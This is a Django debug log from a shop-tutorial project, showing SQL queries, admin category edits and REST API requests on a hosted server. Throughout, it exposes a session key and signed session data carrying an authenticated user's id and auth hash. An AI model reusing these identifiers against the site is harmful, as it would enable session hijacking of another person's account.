HTTP/1.0" 200 4657 DEBUG 2019-12-05 09:14:54,860 utils 28610 139878622488320 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:54.850958+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 54, 850958, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:54,863 utils 28610 139878622488320 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:14:54] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 09:14:55] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 [05/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 09:15:19,758 utils 28610 139878622488320 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:15:19.748486+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 15, 19, 748486, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:15:19,760 utils 28610 139878622488320 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:15:19,763 utils 28610 139878622488320 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:15:19,763 utils 28610 139878622488320 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:15:19,768 utils 28610 139878622488320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-05 09:15:19,825 utils 28610 139878622488320 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:15:19.823624+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 15, 19, 823624, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:15:19] "GET /shop/category/ HTTP/1.0" 200 4483 DEBUG 2019-12-05 09:15:20,090 utils 28610 139878622488320 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:15:20.081596+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 15, 20, 81596, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:15:20,093 utils 28610 139878622488320 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:15:20] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /api/v1/categories/ [05/Dec/2019 09:16:40] "GET /api/v1/categories/ HTTP/1.0" 404 6432 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... December 05, 2019 - 09:14:21 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-05 09:19:49,224 utils 28908 140676977096448 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:19:49,231 utils 28908 140676977096448 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-05 09:19:50,965 utils 28908 140676876654336 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:19:50,977 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-05 09:19:51,036 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:19:51,040 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-05 09:19:51,069 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:19:51.063468+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 19, 51, 63468, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:19:51,149 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:19:51.147377+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 19, 51, 147377, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:19:51] "GET /api/v1/categories/ HTTP/1.0" 200 9904 [05/Dec/2019 09:19:51] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [05/Dec/2019 09:19:51] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [05/Dec/2019 09:19:51] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [05/Dec/2019 09:19:51] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [05/Dec/2019 09:19:51] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [05/Dec/2019 09:19:51] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [05/Dec/2019 09:19:51] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [05/Dec/2019 09:19:52] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [05/Dec/2019 09:19:52] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [05/Dec/2019 09:19:52] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [05/Dec/2019 09:19:52] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 [05/Dec/2019 09:20:12] "GET / HTTP/1.0" 302 0 [05/Dec/2019 09:25:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 09:26:03,216 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:26:03.206775+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 26, 3, 206775, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:26:03,220 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:26:03,236 utils 28908 140676861576960 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-05 09:26:03,275 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:26:03,314 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:26:03.311911+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 26, 3, 311911, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:26:03] "GET /shop/category/add/ HTTP/1.0" 200 6684 DEBUG 2019-12-05 09:26:03,625 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:26:03.615985+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 26, 3, 615985, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:26:03,629 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:26:03] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 09:26:13,414 utils 28908 140676861576960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:26:13.398743+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 26, 13, 398743, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:26:13,418 utils 28908 140676861576960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:26:13,428 utils 28908 140676861576960 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 09:26:13,431 utils 28908 140676861576960 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-05 09:26:13,435 utils 28908 140676861576960 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 1 AND "shop_category"."slug" = 'ground-fire') LIMIT 1; args=(1, 'ground-fire') DEBUG 2019-12-05 09:26:13,438 utils 28908 140676861576960 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ground Fire' LIMIT 1; args=('Ground Fire',) DEBUG 2019-12-05 09:26:13,442 utils 28908 140676861576960 (0.002) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(1,) DEBUG 2019-12-05 09:26:13,445 utils 28908 140676861576960 (0.002) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 1 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 1, 1, 1] DEBUG 2019-12-05 09:26:13,448 utils 28908 140676861576960 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('Ground Fire', 1, '', '', 'ground-fire', 2, 3, 1, 1) RETURNING "shop_category"."id"; args=('Ground Fire', 1, '', '', 'ground-fire', 2, 3, 1, 1) DEBUG 2019-12-05 09:26:13,450 utils 28908 140676861576960 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-05T09:26:13.448634+00:00'::timestamptz, 6, 8, '2', 'Ground Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 5, 9, 26, 13, 448634, tzinfo=), 6, 8, '2', 'Ground Fire', 1, '[{"added": {}}]') [05/Dec/2019 09:26:13] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-05 09:26:13,747 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:26:13.737503+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 26, 13, 737503, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:26:13,749 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:26:13,752 utils 28908 140676861576960 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:26:13,753 utils 28908 140676861576960 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:26:13,758 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-05 09:26:13,819 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:26:13.817682+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 26, 13, 817682, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:26:13] "GET /shop/category/ HTTP/1.0" 200 4920 DEBUG 2019-12-05 09:26:14,125 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:26:14.116195+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 26, 14, 116195, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:26:14,128 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:26:14] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /admin/api/v1/categories/ [05/Dec/2019 09:28:49] "GET /admin/api/v1/categories/ HTTP/1.0" 404 9275 DEBUG 2019-12-05 09:28:57,185 utils 28908 140676861576960 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:28:57,189 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-05 09:28:57,191 utils 28908 140676861576960 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-05 09:28:57,210 utils 28908 140676861576960 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:28:57,212 utils 28908 140676861576960 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-05 09:28:57,222 utils 28908 140676861576960 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:28:57.219407+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 28, 57, 219407, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:28:57,252 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:28:57.250644+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 28, 57, 250644, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:28:57] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [05/Dec/2019 09:30:18] "GET / HTTP/1.0" 302 0 [05/Dec/2019 09:30:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 09:30:52,151 utils 28908 140676861576960 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yn6ntcb2q3btv6xukrsxu2mhc61kp6di' LIMIT 1; args=('yn6ntcb2q3btv6xukrsxu2mhc61kp6di',) DEBUG 2019-12-05 09:30:52,154 utils 28908 140676861576960 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yn6ntcb2q3btv6xukrsxu2mhc61kp6di', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T09:30:52.152077+00:00'::timestamptz); args=('yn6ntcb2q3btv6xukrsxu2mhc61kp6di', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 9, 30, 52, 152077, tzinfo=)) [05/Dec/2019 09:30:52] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 09:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 09:38:36,523 utils 28908 140676861576960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:38:36.512858+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 38, 36, 512858, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:38:36,527 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:38:36,575 utils 28908 140676861576960 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:38:36.573050+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; 